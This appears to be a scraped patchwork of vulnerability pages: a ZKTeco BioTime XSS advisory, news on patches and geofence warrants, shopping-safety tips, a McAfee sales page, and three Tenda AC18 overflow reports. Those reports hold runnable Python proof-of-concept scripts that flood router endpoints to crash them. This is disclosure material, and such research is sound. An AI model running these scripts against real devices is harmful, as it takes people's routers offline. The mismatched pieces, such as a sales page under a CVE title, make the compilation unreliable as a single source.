Zkteco BioTime < 8.5.3 Build:20200816.447 is vulnerable to Incorrect Access Control via Leave, overtime, Manual log. An authenticated employee can read local files by exploiting XSS into a pdf generator when exporting data as a PDF

Employee can exploit XSS into local file read using PDF generator in Zkteco Biotime

Security Advisory

Topic: Employee can exploit XSS into local file read using PDF generator in Zkteco Biotime

Category: Zkteco Biotime

Module: webgui

Announced: 01-09-2022

Credits: Ahmed Kameran From https://technobase.krd/ -- https://twitter.com/hamoshwani

CVE ID: CVE-2022-38803

Affects: BioTime - < 8.5.3 Build:20200816.447

Corrected: BioTime - > 8.5.3 Build:20200816.447

1\. Background

BioTime 8.0 is a powerful web-based time and attendance management software that provides a stable connection to ZKTeco's

standalone push communication devices by Ethernet/Wi-Fi/GPRS/3G and working as a private cloud to

offer employee self-service by mobile application and web browser.

2\. Problem Description

A Cross-Site Scripting (XSS) vulnerabilities was found in

BioTime BioTime - < 8.5.3 Build:20200816.447 that could lead to local file read when an employee try to export injected payload using pdf

the pdf generator will simply execute the javascript code inside the injected payload that can lead to Local file read

Vulenrable models:

1- When requesting for leave

Parameter: reason

2- When requesting for overtime

Parameter: reason

3- When requesting for Manual log

Parameter: reason

3\. Impact

Due to the lack of proper encoding on the affected parameters susceptible to

XSS, arbitrary JavaScript could be executed by pdf generator's headless browser that could lead to local file read

4\. Solution

Users can upgrade to 8.5.4 or later.

Please find latest version from the Zkteco main website or they provide hardcopy of the software when you buy an Iface or any attendance devices make sure

You install versions higher than 8.5.3

CVE-2022-38803: Employee can exploit XSS into local file read using PDF generator in Zkteco Biotime

Plus: Major patches dropped this month for Chrome, Firefox, VMware, Cisco, Citrix, and SAP.

November saw the release of patches from the likes of Apple’s iOS, Google Chrome, Firefox, and Microsoft Windows to fix multiple security vulnerabilities. Some of these issues are pretty severe, and several have already been exploited by attackers. 

Here’s what you need to know about all the important updates released in the past month.

Apple iOS and iPadOS 16.1.1

Apple has released iOS and iPadOS 16.1.1, which the iPhone maker recommends all users apply. The patch fixes two security vulnerabilities—and given the speed of the release, you can assume they are pretty serious. 

Tracked as CVE-2022-40303 and CVE-2022-40304, the two flaws in the libxml2 software library could allow an attacker to execute code remotely, according to Apple’s support page. The issues were both reported by security researchers working for Google’s Project Zero. 

For Mac users, the flaws were addressed by macOS Ventura 13.0.1.

The good news is, it’s believed neither vulnerability has been exploited by attackers, but it’s still a good idea to apply the update as soon as possible. 

Microsoft Windows

Microsoft’s November Patch Tuesday was another big release, seeing the Windows maker fix 68 vulnerabilities, four of which were zero days. 

Tracked as CVE-2022-41073, the first is a Windows print spooler elevation of privilege vulnerability that could allow a cybercriminal to gain system privileges. Meanwhile, CVE-2022-41125 is a Windows Cryptographic Next Generation key isolation issue that could allow an adversary to escalate privileges and gain control of the system. CVE-2022-41128 is a Windows scripting language vulnerability that could result in remote code execution. Lastly, CVE-2022-41091 is a vulnerability in Microsoft’s Mark of the Web security feature.

Google Android

More big updates for users of Google’s Android devices have arrived in November, with Google issuing patches for multiple vulnerabilities, some of which are serious. At the top of the list is a high-severity vulnerability in the Framework component that could lead to local escalation of privilege, Google said in a security advisory.

The patches in November include two Google Play system updates for issues impacting the Media Framework components (CVE-2022-2209) and WiFi (CVE-2022-20463). Google also fixed five issues affecting its Pixel devices.

The Android updates have started to roll out to Samsung devices, including third- and fourth-generation Galaxy foldables. You can check for the update in your Settings. 

Google Chrome 

The world’s most popular browser continues to be a major target for attackers, with Google this month fixing its eighth zero-day vulnerability this year. 

The vulnerability, tracked as CVE-2022-4135, is a heap buffer overflow in GPU reported by Clement Lecigne, a researcher in Google's own threat analysis group. Google said it “is aware that an exploit for CVE-2022-4135 exists in the wild.”

Earlier in the month, Google issued an update to fix 10 Chrome vulnerabilities, six of which are rated as high-severity. These include four use-after-free bugs: CVE-2022-3885, CVE-2022-3886, CVE-2022-3887, and CVE-2022-3888. Meanwhile, CVE-2022-3889 is a “type confusion” issue in V8, and CVE-2022-3890 is a heap buffer overflow in Crashpad. 

Mozilla Firefox

November was also a big month for Google Chrome competitor Firefox. Mozilla has issued Firefox 107, fixing 19 security vulnerabilities, eight of which are marked as having a high impact. 

One of the most important patches is for CVE-2022-45404, a full-screen notification bypass that could allow an attacker to cause a window to go full-screen without the user seeing the notification prompt. This could result in spoofing attacks. Meanwhile, several use-after-free bugs could lead to an exploitable crash, and one flaw could be exploited to run arbitrary code.

VMWare

Software maker VMWare has released security fixes for multiple security vulnerabilities in its VMware Workspace ONE Assist, three of which have a CVSSv3 base score of 9.8. The first, CVE-2022-31685, is an authentication bypass vulnerability. “A malicious actor with network access to Workspace ONE Assist may be able to obtain administrative access without the need to authenticate to the application,” VMWare warned in an advisory.

A broken authentication method vulnerability tracked as CVE-2022-31686 could enable a malicious actor with network access to obtain admin access without the need to authenticate.

Drop What You're Doing and Update iOS, Android, and Windows

The /device/acceptBind end-point for Ourphoto App version 1.4.1 does not require authentication or authorization. The user_token header is not implemented or present on this end-point. An attacker can send a request to bind their account to any users picture frame, then send a POST request to accept their own bind request, without the end-users approval or interaction.

CVE-2022-24190: Automating Unsolicited Richard Pics; Pwning 60,000 Digital Picture Frames

Google provided investigators with location data for more than 5,000 devices as part of the federal investigation into the attack on the US Capitol.

The FBI’s biggest-ever investigation included the biggest-ever haul of phones from controversial geofence warrants, court records show. A filing in the case of one of the January 6 suspects, David Rhine, shows that Google initially identified 5,723 devices as being in or near the US Capitol during the riot. Only around 900 people have so far been charged with offenses relating to the siege.

The filing suggests that dozens of phones that were in airplane mode during the riot, or otherwise out of cell service, were caught up in the trawl. Nor could users erase their digital trails later. In fact, 37 people who attempted to delete their location data following the attacks were singled out by the FBI for greater scrutiny.

Geofence search warrants are intended to locate anyone in a given area using digital services. Because Google’s Location History system is both powerful and widely used, the company is served about 10,000 geofence warrants in the US each year. Location History leverages GPS, Wi-Fi, and Bluetooth signals to pinpoint a phone within a few yards. Although the final location is still subject to some uncertainty, it is usually much more precise than triangulating signals from cell towers. Location History is turned off by default, but around a third of Google users switch it on, enabling services like real-time traffic prediction. 

The geofence warrants served on Google shortly after the riot remained sealed. But lawyers for Rhine, a Washington man accused of various federal crimes on January 6, recently filed a motion to suppress the geofence evidence. The motion, which details the warrant’s process and scale, was first reported by the Empty Wheel blog. 

In a statement, a Google spokesperson defended the company’s handling of geofence warrants.

“We have a rigorous process for geofence warrants that is designed to protect the privacy of our users while supporting the important work of law enforcement,” the company said. “When Google receives legal demands, we examine them closely for legal validity and constitutional concerns, including overbreadth, consistent with developing case law. If a request asks for too much information, we work to narrow it. We routinely push back on overbroad demands, including overbroad geofence demands, and in some cases, we object to producing any information at all.”

Google requires a three-step process for geofence warrants to narrow their scope to only those most likely to be guilty of a crime. In the first and broadest step, the FBI asked Google to identify all devices in a 4-acre area, including the Capitol and its immediate surroundings, between 2 pm and 6:30 pm on January 6. Google initially found 5,653 active devices that “were or could have been” within the geofence at that time. When Google added in data from devices that only connected to its servers later that day, or the next, the number increased to 5,723. (Location History works in airplane mode because phones can continue to receive GPS satellite signals.)

In the second step, the FBI asked Google for a list of devices that were present at the Capitol from 12 pm to 12:15 pm on January 6, and from 9 pm to 9:15 pm. As there were no rioters in the Capitol during those times, these devices likely belonged to congressional members or staff, police, and other people authorized to be there. Over 200 such phones were excluded from the initial list, reducing its total to 5,518. 

For the final step, the government sought subscriber information, including phone numbers, Google accounts, and email addresses, for two groups of users. The first was for devices that appeared to have been entirely within the geofence, to about a 70 percent probability. The second was any devices for which the Location History was deleted between January 6 and January 13. 

From this, in early May 2021, the FBI received identifying details for 1,535 users, as well as detailed maps showing how their phones moved through the Capitol and its grounds. Geofence evidence has so far been cited in over 100 charging documents from January 6. In nearly 50 cases, geofence data seems to have provided the initial identification of suspected rioters. 

Rhine was first flagged to the FBI by tipsters who had heard that he had been inside the Capitol. But investigators only identified him in surveillance footage after they matched it against the precise geofence coordinates of his phone. His lawyer is now trying to get the geofence evidence thrown out on a number of grounds, including that it was overly broad in who it rounded up, and that Rhine had a constitutional expectation of privacy in his Google data. 

“The government enlisted Google to search untold millions of unknown accounts in a massive fishing expedition,” the attorneys wrote. “Just a small amount of Location History can identify individuals … engaged in personal and protected activities (such as exercising their rights under the First Amendment). And as a result, a geofence warrant almost always involves intrusion into constitutionally protected areas.”

If the judge tosses the geofence evidence in the Rhine case, there is a chance that he and other suspects identified using it could walk free. 

Matthew Tokson, a law professor and Fourth Amendment expert at the University of Utah, says there remains a high level of uncertainty around the whole idea of geofence warrants: “Some courts have said they are valid. Some have said they are overbroad and sweep up too many innocent people. We are still in the very early stages of this.”

Despite the unprecedented number of individuals swept up in the January 6 search warrant and some strong arguments from Rhine’s lawyer, Tokson thinks the chance of his motion succeeding is very low. “Unlike a geofence warrant for a bank robbery, the people in this location are all likely to be engaged in at least a low-level criminal trespass and in some cases worse,” he says. “There’s a stronger than usual probable cause argument in favor of the government here.”

Andrew Ferguson, a professor of law at American University, agrees. “And that worries me because the January 6 cases are going to be used to build a doctrine that will essentially enable police to find almost anyone with a cellphone or a smart device in ways that we, as a society, haven’t quite grasped yet,” he says. “That is going to undermine the work of journalists, it’s going to undermine political dissenters, and it's going to harm women who are trying to get abortion services.”

The judge is likely to rule on Rhine’s motion in December, with his trial scheduled for late January 2023. While that will decide Rhine’s fate, it is unlikely to settle the question of geofence warrants more broadly. “This very likely will be appealed one way or the other,” says Tokson. “It’s going to be a very high-level, high-profile case likely to generate a major precedent out of the appeals court, if not the Supreme Court.”

A Peek Inside the FBI's Unprecedented January 6 Geofence Dragnet

'Tis the season for swindlers and hackers. Use these tips to spot frauds and keep your payment info secure.

Black Friday attracts crowds, and crowds attract scammers, and that means you need to take extra care when shopping online over the Black Friday and Cyber Monday weekend. There'll be people out there eager to relieve you of more money than you'll save on a TV set or a gaming console.

The following precautions apply any time of year, but it's worth reminding yourself of them every time a serious holiday season comes around. In the rush to get gifts sorted, it's all too easy to miss a warning sign, or get complacent about online security.

Update All Your Software

Keeping programs and operating systems up to date is important enough that Microsoft, Apple, Google, Mozilla, and all the other big names in tech now make it difficult for anyone to lag behind with their updates—most of the time you'll be prompted regularly to install new versions of your software, and it might even happen automatically in the background without you noticing.

The biggest retail event of the year has grown into an entire month of sales that ebb and flow. Here’s how to make the most of it.

Today's browsers, apps, and OSes are adept at spotting scams as they happen, whether it's phishing emails (designed to lure you to a fake shopping or banking site) or unauthorized logins on your accounts. To make the most of this built-in security, ensure you're running the latest versions across the board, which means the latest security patches—if you've been putting off updates on your phone or your computer, then get them done ahead of Black Friday.

If you do have a laptop that's too old to run the latest versions of Windows or macOS, avoid using it if possible—you'll be safer shopping on your phone, as long as it's running the most recent Android or iOS updates. On Android, you can check for updates via **System** and **System Update** in Settings; on iOS, it's **Settings** and then **General** and **Software Update**.

Be Wary of Email and Social Media Deals

You're likely to be inundated with special offers over email and social media this Black Friday, but be careful when it comes to clicking through on deals that come from suspicious sources (stores you've never shopped at before, for example). Always check that the link you clicked sent you to the website you were expecting to visit.

There's no hard and fast way to guarantee you'll never get caught out by a dodgy link (apart from just ignoring them all completely), but you can minimize the risk: Check that the social media account or email address sending the link is genuine, head to the site in question in a separate browser window to see whether you can find the same offer advertised, and be sure the offer you're looking at is the one that was promoted.

If your browser is up to date, as we mentioned above, dangerous links should be blocked before you reach them, but we'd still recommend being wary. You'll see some great offers advertised over social media and email, but no discount is worth the risk of exposing yourself to scammers.

Make sure all your devices are updated before shopping.

Android via David Nield

Do Your Research

Wherever possible, stick to trusted stores online. All the major players have robust security procedures in place, so the chances of them (and you) getting hacked are smaller. Still, if you're buying from any site, always check you're on the store website you think you are by checking in your browser's address bar.

We're not saying you should never shop at smaller outlets, but make sure they're using HTTPS technology (indicated with a padlock in your browser's address bar). Look for contact details, an office with a physical address, and reviews left by other users (Trustpilot can be helpful here). See if they're on Twitter and Facebook—and whether those accounts are actually active.

Debit and credit card issuers will usually protect you against fraud—check their policies online if you're not sure about yours—but nevertheless, keep an eye on your bank accounts throughout the Black Friday weekend to make sure only the amounts you're expecting to be debited are going out.

Double-Check Deals

Retailers change their prices all the time—especially online—so a "big discount" you see might only apply to whatever the price was last week, not what it's been over the course of the past year. Price trackers such as CamelCamelCamel can help you work out whether you're getting a genuine bargain or just something that was already heavily reduced.

Checking out product reviews on the web is a useful way of determining how current something is and how much you should be spending on it. Are you looking at the genuine article, or just a cheap knock-off? Is the gadget you're about to buy future-proofed with the latest tech or will it be out of date in six months? And (especially on Amazon) is it being sent from your current region or the other side of the world? Who's the actual seller? Make sure you read what previous buyers have to say via the user reviews before spending your money.

Just be aware that stores also use the occasion to try and shift their remaining stock of older, less popular products. Make sure you're looking at what you're buying and not just the price drop.

CamelCamelCamel will show you previous price drops on Amazon.

CamelCamelCamel via David Nield

Protect Your Accounts

As always, keep your accounts locked down and protected on Black Friday. Use strong, unique passwords for all your accounts (a dedicated password manager or your browser's password management system can help here), and turn on two-factor authentication on every account that offers it (Microsoft, Apple, Google, Facebook, and Twitter ones all do, for a start).

While it may seem convenient to quickly set up a new shopping account with your “usual” password, it only takes one account sharing the same password to get exposed, and all the others can come tumbling down after it. If you're using the latest versions of Chrome and Safari, you'll notice you can now use a strong password suggested by your browser (the option should pop up automatically when you're in a password field).

If you're planning on shopping at outlets where you haven't purchased anything before, it's a good idea to get these accounts set up ahead of time—this means you aren't rushing when it comes to thinking up new passwords and entering potentially sensitive information into your web browser.

Guard Your Payment Info

Many places that you're shopping at on Black Friday and Cyber Monday will already have your payment info on file, but if you're entering details into a new site, again make sure the padlock symbol is showing in the address bar—the full URL should also begin “https://”, which indicates that your payment details will be encrypted in transit.

If you’re on vacation or out of town, we recommend waiting until you get back home before buying anything—or at least using the cellular data on your phone to make a connection rather than a public Wi-Fi hotspot, as it's much harder for hackers to intercept your details (or look over your shoulder as you're typing them). If you are shopping in-store, be careful to guard your PIN numbers and other sensitive details when you're surrounded by crowds—or even just one shop assistant.

As tempting as Black Friday offers might be, it's usually a good idea to shop in as few places as possible, if you can: The fewer companies that hold your payment data, the less likely you are to be victim to a data breach, and the risk of those breaches are really down to the company's security policies rather than any precautions you can take.

How to Avoid Black Friday Scams Online

McAfee Total Protection prior to version 16.0.49 contains an uncontrolled search path element vulnerability due to the use of a variable pointing to a subdirectory that may be controllable by an unprivileged user. This may have allowed the unprivileged user to execute arbitrary code with system privileges.

NEW  **Introducing**

****Get savings**  
on protection**

The **Black Friday Sale** is here with all the discounts you expect on all-in-one protection.

Windows® | macOS® | Android™ | iOS® | ChromeOS™️

NEW  **Introducing**

****Personalized** protection**

All-in-one protection for your identity, privacy, and more. Includes antivirus, VPN, and Protection Score.

NEW  **Introducing**

****The ultimate protection** for your privacy**

We help you stay private and secure online with personal data removal from risky sites, $1M identity theft coverage, device protection, and more.

NEW  **Introducing**

****Stop fraud** before it starts**

Credit monitoring offers daily updates to your credit score, including alerts to changes that may signal identity fraud.​

NEW  **Introducing**

****Next-level confidence** for identity, privacy, and device protection​**

Our ultimate identity and privacy protection to confidently live life online, with comprehensive identity monitoring, credit monitoring, credit freeze and lock, up to $1M identity theft coverage, and help to remove your personal info online.

**Live your life online freely and confidently  
with award-winning online protection**

**$1 million in coverage**

Advanced plans include $1,000,000 coverage to cover eligible losses and fees due to identity theft and fraud.‡

**24/7/365 customer support**

Get around the clock assistance from friendly, knowledgable security experts.

**100% guaranteed**

We pledge to remove viruses on your devices or give you your money back, guaranteed.\*\*

****We’ve got your back****

Guided, personalized online protection that makes being safe simple, wherever you are.

**Do what you do online, we’ll protect your privacy**

**New!** Remove your personal info from the riskiest data broker sites that sell it with

Personal Data Cleanup

. We scan **2x data broker sites** compared to similar cybersecurity services. Available with our Premium and higher-tier plans.

Stay private with a **VPN** that turns on automatically for public Wi-Fi, protecting account credentials, search habits, and more.

**Take action to help prevent identity theft**

**New!**

Security Freeze

helps prevent unauthorized access to new or existing credit, bank, and utility accounts in your name. Available in Advanced plans.​

We help you monitor your email addresses, SSN, bank account and credit card numbers and more. If we detect a change, we'll alert you an average of **10 months sooner** than the competition.​​​

$1M identity theft coverage & restoration

is available in Advanced plans.​​

Get expanded monitoring with auto-renewal turned on.

**Protection Score keeps you safer**

Protection Score checks the health of your online protection and provides simple instructions to improve your security. Knowing how safe you are is the first step toward a safer life online—what's your Protection Score?

**Protect your computers and smartphones**

Get 24/7 protection with award-winning antivirus and safe browsing security. Avoid risky websites, and stay safe from phishing, viruses, hackers and ransomware.

Previous Next

**What our customers are saying**

I love the new UI experience, the app really needed the new look. The app **protects my device against viruses and malware really well**

\- Drew M

★ ★ ★ ★ ★

Use it on all my devices, trusted without problems! Also **the ID Protection is amazing...**.get it now.​

\- Joe

★ ★ ★ ★ ★

I feel much more **protected from identity theft, viruses, and malware**

\- M.B.

★ ★ ★ ★ ★

Easy to download and use. **Gives me peace of mind.**

\- Jeanne C

★ ★ ★ ★ ★

**I feel very secure with McAfee Security.** I get notifications of breaches and immediately take action to resolve them.

\- Kelly G

★ ★ ★ ★ ★

I have loved the VPN option and feel safer now when connecting to public wifi.

\- Su L

★ ★ ★ ★ ★

**Keeps me safe all the time,** is there right behind me doing its thing. Always a pleasure. Protects my desktop PC as well for going on 9 years now. No complaints.

\- Anglynn

★ ★ ★ ★ ★

Excellent! I am very happy with the way **McAfee blocks spam constantly** as well as other unwanted visitors.

\- Maxine P

★ ★ ★ ★ ★

Great relief from fear of Hackers. I have great confidence with McAfee products, they provide me **excellent service to all my family devices.** Keep up the good work.

\- Padma M

★ ★ ★ ★ ★

Makes me feel more safe when online. Love the VPN feature. Love the fact that it **keeps me informed about threats,** how to deal with or that they dealt with the problem.

\- Elain W

★ ★ ★ ★ ★

**VPN, Antivirus and safe WiFi all in one App.** Seemless automatic scanning. Has solved problems with Identity theft and unwanted spam. Great Safe Browsing feature.

\- Rudy C

★ ★ ★ ★ ★

I didn't realize how much of my personal information was out there.

\- Ed B

★ ★ ★ ★ ★

I like feeling confident that **McAfee is working to protect my personal information.**

\- Janis C

★ ★ ★ ★ ★

Easy to use and necessary to have. **Wonderful!**

\- Aris C

★ ★ ★ ★ ★

****Industry-leading** online  
protection loved by millions**

****Trusted security****

for over 600 million devices

****Highest rating****

for security by SE Labs

****42 million****

threats blocked per day

**Clean up and speed up with ​**McAfee PC Optimizer****

Get your PC running up to twice as fast and boost your internet with just a few clicks with PC Optimizer. We'll remove outdated files, optimize your system, and reclaim bandwidth. Say goodbye to frustrating lag and enjoy your life online.

****Try** McAfee Total Protection for free**

Stay safe. Experience more. With McAfee Total Protection, you can easily protect how you browse, game, and connect, now with identity and privacy protection. Try our all-in-one online protection free for 30 days. ​

Windows® | macOS® | Android™ | iOS® | ChromeOS™

****Complete protection** for your mobile online life**

With McAfee Mobile Security, extend your online protection and privacy with a simple, all-in-one security solution. Connect confidently from the palm of your hand wherever you go.

Scan this QR code to download the McAfee Security mobile app directly to your phone or tablet from the Apple or Google Play app store.

CVE-2022-43751: Antivirus, VPN, Identity & Privacy Protection | McAfee

There is a buffer overflow vulnerability in ZTE MF286R. Due to lack of input validation on parameters of the wifi interface, an authenticated attacker could use the vulnerability to perform a denial of service attack.

CVE-2022-39067: Security Bulletin Details

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function form_fast_setting_wifi_set.

Permalink

Cannot retrieve contributors at this time

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the form_fast_setting_wifi_set function, which can be accessed through the URL goform/fast_setting_wifi_set .

This function accepts the POST parameter timeZone, does not verify its length, and copies it directly to a local variable on the stack, causing a stack overflow. This vulnerability allows attackers to cause a Denial of Service (DoS).

**PoC**

Poc of Denial of Service(DoS)

 import requests
pl \= b"A"\*0x100 + b":" + b"A"\*0x400
data \= {
    b"ssid": b'A',
    b"timeZone": pl
}
res \= requests.post("http://192.168.0.1/goform/fast\_setting\_wifi\_set", data\=data)
print(res.content)

CVE-2022-44171: IoT_vuln/Tenda_AC18_V15.03.05.19_Vuln_timeZone.md at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formWifiWpsStart.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formWifiWpsStart function, which can be accessed through the URL goform/WifiWpsStart .

The index and mode are controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check,which leads to a stack overflow vulnerability. This vulnerability allows attackers to cause a Denial of Service (DoS).

**PoC**

Poc of Denial of Service(DoS)

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'mode=1&index=' + p1

p3 \= b"POST /goform/WifiWpsStart" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2
r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44177: IoT_vuln/Tenda/AC18/formWifiWpsStart at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetWifiGuestBasic function, which can be accessed through the URL goform/SetWifiGuestBasic.

In formSetWifiGuestBasic function, v14 is controllable and will be passed into the sub_7EA98 function. In the sub_7EA98 function, a2 will be spliced into s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

In set_wl_guest_qos_list function

In sub_7EA98 function

**PoC**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'shareSpeed=' + p1

p3 \= b"POST /goform/SetWifiGuestBasic" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

Tag

#wifi